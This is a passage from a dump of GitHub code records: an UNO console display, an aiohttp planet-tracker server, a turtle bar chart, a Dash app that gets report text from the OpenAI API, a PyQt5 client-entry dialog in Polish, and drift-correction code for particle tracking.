`python -m pytest ./day-03/part-2\\silvestre.py` to test the submission.\n \"\"\"\n assert (\n SilvestreSubmission().run(\n \"\"\"\n\"\"\".strip()\n )\n == None\n )\n","repo_name":"badouralix/adventofcode-2022","sub_path":"day-03/part-2/silvestre.py","file_name":"silvestre.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"31"} +{"seq_id":"8866603909","text":"import os\nfrom EnumsCards import *\n\n\ndef showToDrawnCards(drawCards):\n print(\"+Cards: \" + str(drawCards[0]) + \"\\t\", end=\"\")\n\n\ndef showDirection(direction):\n if(direction == 1):\n print(\"Direction: Clockwise\\t\", end=\"\")\n else:\n print(\"Direction C-Clockwise\\t\", end=\"\")\n\n\ndef showHand(hand):\n whichCard = 0\n for card in hand:\n print(\"\" + str(card.getValue()) + \" \" +\n str(card.getColor()) + \" \\t\\t\\t->\\t \" + str(whichCard))\n whichCard += 1\n\n\ndef showOptions(hand):\n print()\n print(\"Pass -> P\")\n print(\"Draw Card(s) -> D\")\n if(len(hand) == 2):\n print(\"UNO! -> U\")\n\n\ndef showCurrentScreen(hand, direction, lastCard, playerName, drawCards):\n clearScreen()\n showPlayerName(playerName)\n showDirection(direction)\n showToDrawnCards(drawCards)\n showLastCard(lastCard)\n showHand(hand)\n showOptions(hand)\n\n\ndef showPlayerName(playerName):\n print(\"Name: \" + playerName + \"\\t\", end=\"\")\n\n\ndef showLastCard(lastCard):\n print(\"Last Card: \" + str(lastCard.getValue()) +\n \" \" + str(lastCard.getColor()))\n\n\ndef clearScreen():\n os.system(\"cls\" if os.name == \"nt\" else \"clear\")\n\n\ndef showChooseColorScreen(startMessage, hand, direction, lastCard, playerName, drawCards):\n clearScreen()\n showPlayerName(playerName)\n showDirection(direction)\n showToDrawnCards(drawCards)\n showLastCard(lastCard)\n showHand(hand)\n print(startMessage)\n print(\"Choose a new color:\")\n print(\"blue\\t->\\tb\")\n print(\"red\\t->\\tr\")\n print(\"yellow\\t->\\ty\")\n print(\"green\\t->\\tg\")\n newColor = input().lower()\n if(newColor == \"b\"):\n return 0\n elif(newColor == \"r\"):\n return 1\n elif(newColor == \"y\"):\n return 2\n elif(newColor == \"g\"):\n return 3\n else:\n return showChooseColorScreen(\"Not a color!\")\n\n\ndef showPointsOfPlayers(pointsOfPlayers, names):\n i = 0\n for points in pointsOfPlayers:\n print(\"Points of \" + names[i] + \": \" + str(pointsOfPlayers[i]))\n i += 1\n","repo_name":"NWuensche/UNOinPython","sub_path":"CurrentScreen.py","file_name":"CurrentScreen.py","file_ext":"py","file_size_in_byte":2028,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"37546401970","text":"from planet_tracker import PlanetTracker\r\nfrom aiohttp import web\r\n\r\nimport asyncio\r\n\r\n\r\n__all__ = [\"app\"]\r\n\r\n\r\nroutes = web.RouteTableDef()\r\n\r\n\r\n# Testing route: http://localhost:8000/\r\n@routes.get('/')\r\nasync def hello(request):\r\n return web.FileResponse(\"./planet_tracker_index.html\")\r\n\r\n\r\n# Testing route: http://localhost:8000/planets/mars?long=145.05&lat=-39.754&elevation=0\r\n@routes.get(\"/planets/{name}\")\r\nasync def get_planet_ephmeris(request):\r\n\tplanet_name = request.match_info['name']\r\n\tdata = request.query\r\n\tgeo_location_data = {}\r\n\ttry:\r\n\t\tgeo_location_data = {\r\n\t\t\t'long': str(data['long']),\r\n\t\t\t'lat': str(data['lat']),\r\n\t\t\t'elevation': float(data['elevation'])\r\n\t\t}\r\n\texcept KeyError as err:\r\n\t\tgeo_location_data = {\r\n\t\t\t'long': '-0.0005',\r\n\t\t\t'lat': '51.4769',\r\n\t\t\t'elevation': 0.0\r\n\t\t}\r\n\r\n\tplanet_tracker = PlanetTracker()\r\n\tplanet_tracker.lat = geo_location_data['lat']\r\n\tplanet_tracker.long = geo_location_data['long']\r\n\tplanet_tracker.elevation = geo_location_data['elevation']\r\n\tplanet_data = planet_tracker.calc_planet(planet_name)\r\n\r\n\treturn web.json_response(planet_data)\r\n\r\n\r\napp = web.Application()\r\napp.add_routes(routes)\r\n\r\n# Serving \"static\" assets like CSS and JavaScript - discouraged - just for testing\r\napp.router.add_static('/', './')\r\n\r\n# The web.run_app function runs our app in a blocking manner - non concurrent\r\n# web.run_app(app, host=\"localhost\", port=8000)\r\n\r\n\r\n# For concurrent run :\r\n# run_app() provides a simple blocking API for running an Application.\r\n# For starting the application asynchronously or serving on multiple HOST/PORT, AppRunner exists\r\nasync def start_async_app():\r\n runner = web.AppRunner(app)\r\n await runner.setup()\r\n site = web.TCPSite(runner, \"localhost\", 8000)\r\n await site.start()\r\n return runner, site\r\n\r\nloop = asyncio.get_event_loop()\r\nrunner, site = loop.run_until_complete(start_async_app())\r\n\r\n# To stop serving, call AppRunner.cleanup()\r\ntry:\r\n loop.run_forever()\r\nexcept KeyboardInterrupt as err:\r\n loop.run_until_complete(runner.cleanup())","repo_name":"GitTeaching/concurrency_parallelism_asyncio","sub_path":"asyncio_snippets/planet_tracker_aiohttpapp.py","file_name":"planet_tracker_aiohttpapp.py","file_ext":"py","file_size_in_byte":2043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25878185262","text":"# 6.11 Turtle Bar Chart\n'''\nWe can quickly see that drawing a bar will be similar to\ndrawing a rectangle or a square. Since we will need to do it\na number of times, it makes sense to create a function,\ndrawBar, that will need a turtle and the height of the bar.\nWe will assume that the width of the bar will be 40 units.\nOnce we have the function, we can use a basic for loop to\nprocess the list of data values.\n'''\nimport turtle\n\ndef drawBar(t, height):\n \"\"\" Get turtle t to draw one bar, of height. \"\"\"\n t.begin_fill() # start filling this shape\n t.left(90)\n t.forward(height)\n t.write(str(height))\n t.right(90)\n t.forward(40)\n t.right(90)\n t.forward(height)\n t.left(90)\n t.end_fill() # stop filling this shape\n\n\nxs = [33, 27, 8, 99, 34, 23, 18] # here is the data\nmaxheight = max(xs)\nnumbars = len(xs)\nborder = 10\n\nwn = turtle.Screen() # Set up the window and its attributes\nwn.setworldcoordinates(0-border, 0-border, 40*numbars+border, maxheight+border)\nwn.bgcolor(\"lightgreen\")\n\ntess = turtle.Turtle() # create tess and set some attributes\ntess.color(\"blue\")\ntess.fillcolor(\"red\")\ntess.pensize(3)\n\n\nfor a in xs:\n drawBar(tess, a)\n\nwn.exitonclick()","repo_name":"KenjaminButton/runestone_thinkcspy","sub_path":"6_functions/6.11.turtle_bar_chart.py","file_name":"6.11.turtle_bar_chart.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"24070144801","text":"import pandas as pd\nfrom dash import Dash, html, dcc, callback, Output, Input\nimport plotly.express as px\n\nimport openai\nimport time\n\n\ndef CallDash(sector):\n openai.api_key = 'xxxxxxxx'\n\n messages = [{\"role\": \"system\", \"content\":\n \"I want you to act as a data science instructor. You will explain energy consumption data as an expert.\"}]\n\n def ChatRun(message):\n messages.append(\n {\"role\": \"user\", \"content\": message},\n )\n chat = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo-16k\", messages=messages\n )\n reply = chat.choices[0].message.content\n messages.pop()\n return reply\n\n def PromptEng():\n ChatRun(\"you are a python developer\")\n time.sleep(20)\n ChatRun(\"when I ask you any code related questions, only output the code, without any text.\")\n time.sleep(20)\n ChatRun(\"Dont include any text in your answer, only the code\")\n time.sleep(20)\n ChatRun(\"When I ask further questions, do it like the last response. No explanation, only the code\")\n time.sleep(20)\n ChatRun(\"no text at the end, only the code\")\n\n xls = pd.ExcelFile('./ECUK_2022_Consumption_tables_27102022_cleaned.xlsx')\n sheet_names = xls.sheet_names\n all_sheets_data = {}\n for sheet in sheet_names:\n all_sheets_data[sheet] = pd.read_excel(xls, sheet)\n\n df = all_sheets_data['Table C1']\n labels = df.isna().all(axis=0).cumsum()\n grouped = df.groupby(labels, axis=1)\n small_dataframes = []\n for _, group in grouped:\n small_df = group.dropna(axis=1, how='all')\n small_dataframes.append(small_df)\n\n PlotDict = {}\n for i in range(len(small_dataframes)):\n key = f\"{small_dataframes[i].iloc[-1][0]}\"\n value = small_dataframes[i]\n PlotDict[key] = value\n #print(PlotDict)\n\n df_plot = PlotDict[sector]\n response = ChatRun(f\"Please write a report based on the following dataframe. The unit of the data is thousand tonnes of oil equivalen.\\\n The dataframe is about Energy Consumption in {sector} in the UK from 1970-2021. \\\n The report should summerise the content, show the trends, do comparisions, and give conclusion and future outlook at the end. \\\n The report should be less than 300 words. Don't show the title of the report. Make sure each statement is supported by data and numbers. \\\n I know the data are from the past and may not be useful to predict the future, so don't say it in the report. The dataframe is:\"+str(df_plot))\n\n app = Dash(__name__)\n\n\n # Layout of the Dash application\n\n app.layout = html.Div([\n html.H1(children=f'UK Final Energy Consumption by sector and fuel 1970-2021 - {sector} | Unit: Thousand tonnes of oil equivalent', style={'textAlign':'center'}),\n dcc.Dropdown(df_plot.columns[1:], 'Coal', id='dropdown-selection'),\n dcc.Graph(id='graph-content'),\n dcc.Textarea(\n id='textarea-example',\n value=str(response),\n style={'width': '100%', 'height': 300},\n )\n ])\n\n @callback(\n Output('graph-content', 'figure'),\n Input('dropdown-selection', 'value')\n )\n def update_graph(value):\n return px.line(df_plot, x=df_plot.columns[0], y=str(value))\n\n ##if __name__ == '__main__':\n app.run(debug=False)\n\n#CallDash('Domestic')","repo_name":"Aska0526/ibm-datathon","sub_path":"script/content.py","file_name":"content.py","file_ext":"py","file_size_in_byte":3361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"28010564570","text":"from PyQt5 import QtCore, QtGui, QtWidgets\nfrom .klient import Osoba,Firma\n\nclass Menu_klient(object):\n def __init__(self,system):\n self.system=system\n\n def setupUi(self, Dialog):\n\n Dialog.setObjectName(\"Klienci\")\n Dialog.resize(800, 600)\n Dialog.setStyleSheet(\"background-color: rgb(53, 53, 53);\")\n\n icon = QtGui.QIcon()\n icon.addPixmap(QtGui.QPixmap(\"modules/ikony/plane.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n\n\n Dialog.setWindowIcon(icon)\n\n self.verticalLayout = QtWidgets.QVBoxLayout(Dialog)\n self.verticalLayout.setContentsMargins(9, 9, 9, 9)\n self.verticalLayout.setSpacing(6)\n self.verticalLayout.setObjectName(\"verticalLayout\")\n self.stackedWidget = QtWidgets.QStackedWidget(Dialog)\n self.stackedWidget.setObjectName(\"stackedWidget\")\n self.page = QtWidgets.QWidget()\n self.page.setObjectName(\"page\")\n self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.page)\n self.verticalLayout_2.setContentsMargins(0, 0, 0, 0)\n self.verticalLayout_2.setSpacing(10)\n self.verticalLayout_2.setObjectName(\"verticalLayout_2\")\n self.zmien_na_firme = QtWidgets.QPushButton(self.page)\n self.zmien_na_firme.setStyleSheet(\"background-color: rgb(217, 217, 217);\")\n self.zmien_na_firme.setObjectName(\"zmien_na_firme\")\n\n self.zmien_na_firme.clicked.connect(self.zmiana_na_firma)\n self.verticalLayout_2.addWidget(self.zmien_na_firme)\n self.imie = QtWidgets.QLabel(self.page)\n self.imie.setMinimumSize(QtCore.QSize(0, 0))\n self.imie.setMaximumSize(QtCore.QSize(140, 16777215))\n self.imie.setStyleSheet(\"background-color: rgb(217, 217, 217);\")\n self.imie.setObjectName(\"imie\")\n self.verticalLayout_2.addWidget(self.imie)\n self.miejsce_na_imie = QtWidgets.QLineEdit(self.page)\n self.miejsce_na_imie.setStyleSheet(\"background-color: rgb(255, 255, 255);\")\n self.miejsce_na_imie.setObjectName(\"miejsce_na_imie\")\n\n self.verticalLayout_2.addWidget(self.miejsce_na_imie)\n self.nazwisko = QtWidgets.QLabel(self.page)\n self.nazwisko.setMaximumSize(QtCore.QSize(140, 16777215))\n self.nazwisko.setStyleSheet(\"background-color: rgb(217, 217, 217);\")\n self.nazwisko.setObjectName(\"nazwisko\")\n self.verticalLayout_2.addWidget(self.nazwisko)\n self.mijesce_na_nazwisko = QtWidgets.QLineEdit(self.page)\n self.mijesce_na_nazwisko.setStyleSheet(\"background-color: rgb(255, 255, 255);\")\n self.mijesce_na_nazwisko.setObjectName(\"mijesce_na_nazwisko\")\n self.verticalLayout_2.addWidget(self.mijesce_na_nazwisko)\n self.pesel = QtWidgets.QLabel(self.page)\n self.pesel.setMaximumSize(QtCore.QSize(140, 16777215))\n self.pesel.setStyleSheet(\"background-color: rgb(217, 217, 217);\")\n self.pesel.setObjectName(\"pesel\")\n self.verticalLayout_2.addWidget(self.pesel)\n self.mijejsce_na_pesel = QtWidgets.QLineEdit(self.page)\n self.mijejsce_na_pesel.setStyleSheet(\"background-color: rgb(255, 255, 255);\")\n self.mijejsce_na_pesel.setObjectName(\"mijejsce_na_pesel\")\n self.verticalLayout_2.addWidget(self.mijejsce_na_pesel)\n self.frame = QtWidgets.QFrame(self.page)\n self.frame.setMaximumSize(QtCore.QSize(16777215, 64))\n self.frame.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.frame.setFrameShadow(QtWidgets.QFrame.Raised)\n self.frame.setObjectName(\"frame\")\n self.horizontalLayout = QtWidgets.QHBoxLayout(self.frame)\n self.horizontalLayout.setContentsMargins(0, 0, 0, 0)\n self.horizontalLayout.setSpacing(9)\n self.horizontalLayout.setObjectName(\"horizontalLayout\")\n spacerItem = QtWidgets.QSpacerItem(209, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\n self.horizontalLayout.addItem(spacerItem)\n\n self.przycisk_anuluj = QtWidgets.QPushButton(self.frame)\n self.przycisk_anuluj.setStyleSheet(\"background-color: rgb(217, 217, 217);\")\n self.przycisk_anuluj.setObjectName(\"przycisk_anuluj\")\n self.przycisk_anuluj.clicked.connect(Dialog.close)\n\n self.horizontalLayout.addWidget(self.przycisk_anuluj)\n self.przycisk_dodaj = QtWidgets.QPushButton(self.frame)\n self.przycisk_dodaj.setStyleSheet(\"background-color: rgb(217, 217, 217);\")\n self.przycisk_dodaj.setObjectName(\"przycisk_dodaj\")\n self.przycisk_dodaj.clicked.connect(self.dodaj_klient)\n self.przycisk_dodaj.clicked.connect(Dialog.close)\n\n\n self.horizontalLayout.addWidget(self.przycisk_dodaj)\n self.verticalLayout_2.addWidget(self.frame)\n self.stackedWidget.addWidget(self.page)\n self.page_2 = QtWidgets.QWidget()\n self.page_2.setObjectName(\"page_2\")\n self.verticalLayout_3 = QtWidgets.QVBoxLayout(self.page_2)\n self.verticalLayout_3.setContentsMargins(0, 0, 0, 0)\n self.verticalLayout_3.setSpacing(9)\n self.verticalLayout_3.setObjectName(\"verticalLayout_3\")\n self.pushButton_2 = QtWidgets.QPushButton(self.page_2)\n self.pushButton_2.setStyleSheet(\"background-color: rgb(217, 217, 217);\")\n self.pushButton_2.setObjectName(\"pushButton_2\")\n self.pushButton_2.clicked.connect(self.zmiana_na_klient)\n\n self.verticalLayout_3.addWidget(self.pushButton_2)\n self.nazwa_firmy = QtWidgets.QLabel(self.page_2)\n self.nazwa_firmy.setMaximumSize(QtCore.QSize(140, 16777215))\n self.nazwa_firmy.setStyleSheet(\"background-color: rgb(217, 217, 217);\")\n self.nazwa_firmy.setObjectName(\"nazwa_firmy\")\n self.verticalLayout_3.addWidget(self.nazwa_firmy)\n self.miejsce_na_nazwe_firmy = QtWidgets.QLineEdit(self.page_2)\n self.miejsce_na_nazwe_firmy.setStyleSheet(\"background-color: rgb(255, 255, 255);\")\n self.miejsce_na_nazwe_firmy.setObjectName(\"miejsce_na_nazwe_firmy\")\n self.verticalLayout_3.addWidget(self.miejsce_na_nazwe_firmy)\n self.nip = QtWidgets.QLabel(self.page_2)\n self.nip.setMaximumSize(QtCore.QSize(140, 16777215))\n self.nip.setStyleSheet(\"background-color: rgb(217, 217, 217);\")\n self.nip.setObjectName(\"nip\")\n self.verticalLayout_3.addWidget(self.nip)\n self.miejsce_na_nip = QtWidgets.QLineEdit(self.page_2)\n self.miejsce_na_nip.setStyleSheet(\"background-color: rgb(255, 255, 255);\")\n self.miejsce_na_nip.setObjectName(\"miejsce_na_nip\")\n self.verticalLayout_3.addWidget(self.miejsce_na_nip)\n self.frame_2 = QtWidgets.QFrame(self.page_2)\n self.frame_2.setMinimumSize(QtCore.QSize(0, 0))\n self.frame_2.setMaximumSize(QtCore.QSize(16777215, 64))\n self.frame_2.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.frame_2.setFrameShadow(QtWidgets.QFrame.Raised)\n self.frame_2.setObjectName(\"frame_2\")\n self.horizontalLayout_2 = QtWidgets.QHBoxLayout(self.frame_2)\n self.horizontalLayout_2.setContentsMargins(0, 0, 0, 0)\n self.horizontalLayout_2.setSpacing(9)\n self.horizontalLayout_2.setObjectName(\"horizontalLayout_2\")\n spacerItem1 = QtWidgets.QSpacerItem(209, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\n self.horizontalLayout_2.addItem(spacerItem1)\n self.przycisk_anuluj_2 = QtWidgets.QPushButton(self.frame_2)\n self.przycisk_anuluj_2.setStyleSheet(\"background-color: rgb(217, 217, 217);\")\n self.przycisk_anuluj_2.setObjectName(\"przycisk_anuluj_2\")\n self.przycisk_anuluj_2.clicked.connect(Dialog.close)\n\n self.horizontalLayout_2.addWidget(self.przycisk_anuluj_2)\n self.przycisk_dodaj_2 = QtWidgets.QPushButton(self.frame_2)\n self.przycisk_dodaj_2.setStyleSheet(\"background-color: rgb(217, 217, 217);\")\n self.przycisk_dodaj_2.setObjectName(\"przycisk_dodaj_2\")\n self.przycisk_dodaj_2.clicked.connect(self.dodaj_firma)\n self.przycisk_dodaj_2.clicked.connect(Dialog.close)\n self.horizontalLayout_2.addWidget(self.przycisk_dodaj_2)\n self.verticalLayout_3.addWidget(self.frame_2)\n self.stackedWidget.addWidget(self.page_2)\n self.verticalLayout.addWidget(self.stackedWidget)\n\n self.retranslateUi(Dialog)\n self.stackedWidget.setCurrentIndex(1)\n QtCore.QMetaObject.connectSlotsByName(Dialog)\n\n\n\n def retranslateUi(self, Dialog):\n _translate = QtCore.QCoreApplication.translate\n Dialog.setWindowTitle(_translate(\"Dialog\", \"Dodawanie klienta\"))\n self.zmien_na_firme.setText(_translate(\"Dialog\", \"zmien na firme\"))\n self.imie.setText(_translate(\"Dialog\", \"

Imie

\"))\n self.nazwisko.setText(_translate(\"Dialog\", \"

Nazwisko

\"))\n self.pesel.setText(_translate(\"Dialog\", \"

Pesel

\"))\n self.przycisk_anuluj.setText(_translate(\"Dialog\", \"anuluj\"))\n self.przycisk_dodaj.setText(_translate(\"Dialog\", \"dodaj\"))\n self.pushButton_2.setText(_translate(\"Dialog\", \"zmien na klianta\"))\n self.nazwa_firmy.setText(_translate(\"Dialog\", \"

Nazwa firmy:

\"))\n self.nip.setText(_translate(\"Dialog\", \"

Nip

\"))\n self.przycisk_anuluj_2.setText(_translate(\"Dialog\", \"anuluj\"))\n self.przycisk_dodaj_2.setText(_translate(\"Dialog\", \"dodaj\"))\n self.miejsce_na_nazwe_firmy.setPlaceholderText(_translate(\"Dialog\", \"Wpisz tutaj nazwe firmy.\"))\n self.miejsce_na_imie.setPlaceholderText(_translate(\"Dialog\", \"Wpisz tutaj imię.\"))\n self.mijesce_na_nazwisko.setPlaceholderText(_translate(\"Dialog\", \"Wpisz tutaj nazwisko.\"))\n self.mijejsce_na_pesel.setPlaceholderText(_translate(\"Dialog\", \"Wpisz tutaj pesel.\"))\n self.miejsce_na_nip.setPlaceholderText(_translate(\"Dialog\", \"Wpisz tutaj nip.\"))\n\n\n def zmiana_na_klient(self):\n self.stackedWidget.setCurrentWidget(self.page)\n\n def zmiana_na_firma(self):\n self.stackedWidget.setCurrentWidget(self.page_2)\n\n\n def dodaj_klient(self):\n imie=self.miejsce_na_imie.text()\n nazwisko=self.mijesce_na_nazwisko.text()\n pesel=self.mijejsce_na_pesel.text()\n self.system.dodaj_klienta(Osoba(imie,nazwisko,pesel))\n\n\n\n def dodaj_firma(self):\n nip=self.miejsce_na_nip.text()\n nazwa_firmy=self.miejsce_na_nazwe_firmy.text()\n self.system.dodaj_klienta(Firma(nip,nazwa_firmy))\n\n\n","repo_name":"Bluefish5/Database-Airplane-System","sub_path":"modules/menu_klient.py","file_name":"menu_klient.py","file_ext":"py","file_size_in_byte":10615,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12551747888","text":"import Detection.ctrack as ctrack\nimport Detection.convertFiles as conFiles\nimport Detection.detectParticles as dpart\nimport numpy as np\nimport sys\nimport os\nfrom time import strftime\n\n#correct for rotation of Sample on tracks\ndef rotationCorrection_tracks(part_tracks,drifttracks):\n return\n\n\n\n#create Drift correction on Trajectories\ndef driftCorrection_tracks(part_tracks,drifttracks):\n\n tracklen = len(drifttracks[0].track)\n for tr in part_tracks:\n if len(tr.track) != tracklen:\n print(\"Error: !!!Tracks don't have same length!!!\")\n sys.exit(1)\n\n drift_displ = ctrack.ParticleTrack(id=1,num_elements=tracklen)\n contribnum = np.zeros(tracklen)\n\n for track in drifttracks:\n x = np.nan\n x_start = np.nan\n y = np.nan\n y_start = np.nan\n firstelement = True\n for i in range(tracklen):\n x = track.track[i]['x']\n y = track.track[i]['y']\n if firstelement:\n if not np.isnan(x) and not np.isnan(y):\n x_start = x\n y_start = y\n firstelement = False\n else:\n continue\n else:\n if x != np.nan and y != np.nan:\n if np.isnan(drift_displ.track[i]['x']) and np.isnan(drift_displ.track[i]['y']):\n drift_displ.track[i]['x'] = (x - x_start)\n drift_displ.track[i]['y'] = (y - y_start)\n else:\n drift_displ.track[i]['x'] += x - x_start\n drift_displ.track[i]['y'] += y - y_start\n contribnum[i] += 1\n\n for i in range(len(contribnum)):\n drift_displ.track[i]['x'] /= contribnum[i]\n drift_displ.track[i]['y'] /= contribnum[i]\n\n for track in part_tracks:\n for i in range(len(track.track)):\n if not np.isnan(drift_displ.track[i]['x']) and not np.isnan(drift_displ.track[i]['y']):\n track.track[i]['x'] -= drift_displ.track[i]['x']\n track.track[i]['y'] -= drift_displ.track[i]['y']\n\n return part_tracks\n\n#correct for rotation of Sample on particle positions\ndef rotationCorrection_particles(drifttracks):\n \n tracklen = len(drifttracks[0].track)\n angles = np.zeros((len(drifttracks),tracklen),dtype=np.float)\n for i in range(1,len(drifttracks),1):\n for j in range(tracklen):\n dx = drifttracks[i].track[j]['x'] - drifttracks[0].track[j]['x']\n dy = drifttracks[i].track[j]['y'] - drifttracks[0].track[j]['y']\n angles[i,j] = dy/dx\n angles = np.arctan(angles)\n anglecorrection = angles[1:,1:] - angles[1:,:-1]\n\n return anglecorrection.mean(axis=0), drifttracks[0].track[['x', 'y']]\n\ndef translationCorrection_particles(drifttracks):\n tracklen = len(drifttracks[0].track)\n drift_displ = ctrack.ParticleTrack(id=1,num_elements=tracklen)\n contribnum = np.zeros(tracklen)\n\n for track in drifttracks[:min(1,len(drifttracks))]:\n x = np.nan\n x_start = np.nan\n y = np.nan\n y_start = np.nan\n firstelement = True\n for i in range(tracklen):\n x = track.track[i]['x']\n y = track.track[i]['y']\n\n #USING previous as reference\n if np.isnan(x_start) and np.isnan(y_start):\n x_start = x\n y_start = y\n else:\n if x != np.nan and y != np.nan:\n if np.isnan(drift_displ.track[i]['x']) and np.isnan(drift_displ.track[i]['y']):\n drift_displ.track[i]['x'] = (x - x_start)\n drift_displ.track[i]['y'] = (y - y_start)\n else:\n drift_displ.track[i]['x'] += x - x_start\n drift_displ.track[i]['y'] += y - y_start\n contribnum[i] += 1\n\n ''' \n #USING 0 AS REF\n if firstelement:\n if not np.isnan(x) and not np.isnan(y):\n x_start = x\n y_start = y\n firstelement = False\n else:\n continue\n else:\n if x != np.nan and y != np.nan:\n if np.isnan(drift_displ.track[i]['x']) and np.isnan(drift_displ.track[i]['y']):\n drift_displ.track[i]['x'] = (x - x_start)\n drift_displ.track[i]['y'] = (y - y_start)\n else:\n drift_displ.track[i]['x'] += x - x_start\n drift_displ.track[i]['y'] += y - y_start\n contribnum[i] += 1\n '''\n\n for i in range(len(contribnum)):\n drift_displ.track[i]['x'] /= contribnum[i]\n drift_displ.track[i]['y'] /= contribnum[i]\n drift_displ.track[i]['frame'] = i+1\n\n return drift_displ\n\n\n#create Drift correction on Particle Positions\ndef driftCorrection_particles(part_positions,drifttracks,rotcorrection=True):\n\n tracklen = len(drifttracks[0].track)\n if len(part_positions) != tracklen:\n print(\"Error: !!!Tracks don't have same length!!!\")\n sys.exit(1)\n\n drift_displ = translationCorrection_particles(drifttracks)\n angle_change, rotcenter = rotationCorrection_particles(drifttracks)\n\n \n for i in range(1,len(part_positions)):\n count = 0\n for part in part_positions[i]:\n if not np.isnan(angle_change[i-1]) and rotcorrection:\n l = np.sqrt((part.x - rotcenter[i]['x'])**2 + (part.y - rotcenter[i]['y'])**2)\n phi = np.arctan((part.y - rotcenter[i]['y'])/(part.x - rotcenter[i]['x']))\n factor = np.sign(part.x - rotcenter[i]['x'])\n part.x = rotcenter[i]['x'] + factor * l * np.cos(phi - angle_change[i-1])\n part.y = rotcenter[i]['y'] + factor * l * np.sin(phi - angle_change[i-1])\n if not np.isnan(drift_displ.track[i]['x']) and not np.isnan(drift_displ.track[i]['y']):\n part.x -= drift_displ.track[i]['x']\n part.y -= drift_displ.track[i]['y']\n\n return part_positions\n\ndef doTrack(particle_file,searchRadius=2,minTracklen=1,linkRange=2):\n print(\"Tracking from File\")\n date = strftime(\"%Y%m%d-%H%M%S\")\n path = os.path.dirname(particle_file)\n particles = conFiles.readDetectedParticles(particle_file)\n\n tracks = ctrack.link_particles(particles,searchRadius,link_range=linkRange,min_track_len=minTracklen,outfile=path+\"/foundTracks-SR{:}_{:}.txt\".format(searchRadius,date))\n print(\"Done Linking\\n Writing log file now\")\n\n outfile = open(path+\"/tracking-SR{:}_{:}.log\".format(searchRadius,date),'w')\n timestr = strftime(\"%Y-%m-%d %H:%M:%S\")\n\n outfile.write(\"Tracking Log File\\n==================\\n\\n\")\n outfile.write(\"Time: {:}\\n\".format(timestr))\n outfile.write(\"\\nSystem Parameters:\\n------------------\\n\")\n outfile.write(\"Particle File: {:}\\n\".format(particle_file))\n outfile.write(\"\\nTracking Parameters:\\n---------------------\\n\")\n outfile.write(\"Search Radius = {:}px\\n\".format(searchRadius))\n outfile.write(\"Link Range = {:} frames\\n\".format(linkRange))\n outfile.write(\"Minimum Track Length = {:} frame(s)\\n\".format(minTracklen))\n outfile.write(\"\\n=== Track-IDs =================\\n\")\n for track in tracks:\n outfile.write(\"{:}\\n\".format(track.id))\n outfile.close()\n print(\"Done\")\n\n return tracks\n\ndef doTrack_direct(particles, searchRadius=2,minTracklen=1,linkRange=2,infilename=\"Not Defined\",drift=False,path=\".\"):\n date = strftime(\"%Y%m%d-%H%M%S\")\n\n print(\"Tracking\")\n if drift:\n tracks = ctrack.link_particles(particles,searchRadius,link_range=int(linkRange),min_track_len=minTracklen,outfile=path+'/fiducialTracks-SR{:}_{:}.txt'.format(searchRadius,date))#\"foundTracks-SR{:}_{:}.txt\".format(searchRadius,date))\n else:\n tracks = ctrack.link_particles(particles,searchRadius,link_range=int(linkRange),min_track_len=minTracklen,outfile=path+'/foundTracks-SR{:}_{:}.txt'.format(searchRadius,date))#\"foundTracks-SR{:}_{:}.txt\".format(searchRadius,date))\n\n print(\"Done Linking\\n Writing log file now\")\n\n outfile = open(path+\"/tracking-SR{:}_{:}.log\".format(searchRadius,date),'w')\n timestr = strftime(\"%Y-%m-%d %H:%M:%S\")\n\n outfile.write(\"Tracking Log File\\n==================\\n\\n\")\n outfile.write(\"Time: {:}\\n\".format(timestr))\n outfile.write(\"\\nSystem Parameters:\\n------------------\\n\")\n outfile.write(\"Particle File: {:}\\n\".format(infilename))\n outfile.write(\"\\nTracking Parameters:\\n---------------------\\n\")\n outfile.write(\"Search Radius = {:}px\\n\".format(searchRadius))\n outfile.write(\"Link Range = {:} frames\\n\".format(linkRange))\n outfile.write(\"Minimum Track Length = {:} frame(s)\\n\".format(minTracklen))\n outfile.write(\"\\n=== Track-IDs =================\\n\")\n for track in tracks:\n outfile.write(\"{:}\\n\".format(track.id))\n outfile.close()\n\n return tracks\n\n#Do driftcorrect on detected particles.\ndef position_with_driftcorrect(fn,path='.'):\n #Create drift tracks from positions\n drifttracks = doTrack_direct(fn[1],searchRadius=2,linkRange=2,drift=True,path=path)\n #Apply drift correction to feducial markers for verification and save\n #pparts = driftCorrection_particles(fn[1],drifttracks)\n #path = os.path.dirname(fn[1])\n #date = strftime(\"%Y%m%d-%H%M%S\")\n #doTrack_direct(pparts,outfile=path+\"/driftcorrectedTracksFM-SR{:}_{:}.txt\".format(2,date),infilename=fn[1],linkRange=link_range)\n #Apply drift correction to other channel and save\n #path = os.path.dirname(fn[0])\n print(\"Correcting for Drift now\")\n sys.stdout.flush()\n pparts = driftCorrection_particles(fn[0],drifttracks)\n conFiles.writeParticleFile(pparts,filename=path+\"/driftlessParticles.txt\")\n print(\"Done!\")\n sys.stdout.flush()\n return pparts\n\n#Do drift correct on detected particles and track them afterwards\ndef track_with_driftcorrect(fn,searchRadius,link_range=2,path='.'):\n #Create drift tracks from positions\n drifttracks = doTrack_direct(fn[1],searchRadius=2,linkRange=2,drift=True,path=path)\n #Apply drift correction to feducial markers for verification and save\n '''\n pparts = driftCorrection_particles(fn[1],drifttracks)\n path = os.path.dirname(fn[1])\n date = strftime(\"%Y%m%d-%H%M%S\")\n 